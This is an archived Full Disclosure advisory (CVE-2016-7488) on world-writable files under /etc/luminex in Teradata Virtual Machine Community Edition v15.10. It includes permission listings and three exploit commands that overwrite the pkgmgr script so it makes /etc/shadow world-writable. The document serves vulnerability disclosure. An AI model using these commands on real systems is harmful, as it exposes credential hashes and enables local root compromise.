[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] Teradata Virtual Machine Community Edition v15.10 has insecure file permission
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] Teradata Virtual Machine Community Edition v15.10 has insecure file permission
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Thu, 10 Nov 2016 12:11:55 -0500
Title: Teradata Virtual Machine Community Edition v15.10 has insecure file
permission
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site:
http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
<http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware>
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: webform contact
Description: A database appliance for virtual machine environments.
Vulnerability:
Teradata Virtual Machine Community Edition v15.10 has insecure file permissions
on /etc/luminex/pkgmgr. These could allow a local user to modify its contents
and execute commands as root.
TVME:/ # ls -ld /etc/luminex/
drwxrwxrwx 2 root root 4096 Mar 3 2016 /etc/luminex/
TVME:/# ls -l /etc/luminex/
total 128
-rwxrwxrwx 1 root root 24576 Mar 3 2016 packages.db
-rwxrwxrwx 1 root root 102357 Mar 3 2016 pkgmgr
CVE: CVE-2016-7488
Exploit Code:
• $ echo "#/bin/bash" > /etc/luminex/pkgmgr
• $ echo "chmod 666 /etc/shadow" >> /etc/luminex/pkgmgr
• $ chmod 755 /etc/luminex/pkgmgr
Advisory: http://www.vapidlabs.com/advisory.php?v=172
<http://www.vapidlabs.com/advisory.php?v=172>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/